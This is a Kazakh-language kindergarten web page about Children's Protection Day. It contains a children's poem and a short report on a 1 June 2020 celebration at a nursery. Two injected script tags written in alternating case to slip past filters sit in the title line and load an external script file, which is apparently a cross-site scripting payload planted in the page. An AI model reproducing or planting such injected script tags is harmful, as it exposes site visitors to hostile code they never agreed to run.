Балаларды қорғау күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.06.2020

Бақшамызда бүгін ұзақ ойнайық,

Балаларды қорғау күнін тойлайық.

Алақай-ау , алақай!

Той тойлайық, балақай!

Тақпақ айтып, кезектесіп, бір -бірлеп,

Кел, қосылып ән шырқайық, би билеп!

Алақай-ау , алақай!

Ән шырқайық , балақай!

Ұғып сөзін тәрбиеші апаның,

Гүл жайнаймыз аясында Отанның!

Алақай-ау, алақай!

Гүл жайнайық, балақай!

Жыл он екі айдың жадыраған жаз айы да келіп жетті.
1 маусым Балаларды қорғау күні-ең алғашқы халықаралық мерекелердің бірі. Бұл күн –балалардың шулы да көңілді мерекесі ғана емес ,сондай-ақ балалардың құқығын есіне салатын,иманды да әділетті, қоғамның қалыптасуына жағдай туғызатын мереке. Осы мерекеге орай,  Луначарский көшесіндегі «Ақбота» бөбекжайында  «1 маусым Балаларды қорғау күні» атты әдеби-сазды ойын –сауық ұйымдастырылды. Балаларды таңертең мультфильм кейіпкерлері  бөбекжай  алдынан қарсы алып, мерекелерімен құттықтады.
 

Просмотров: 417


Пікір қосу



Деректерді қолтаңбаға қосу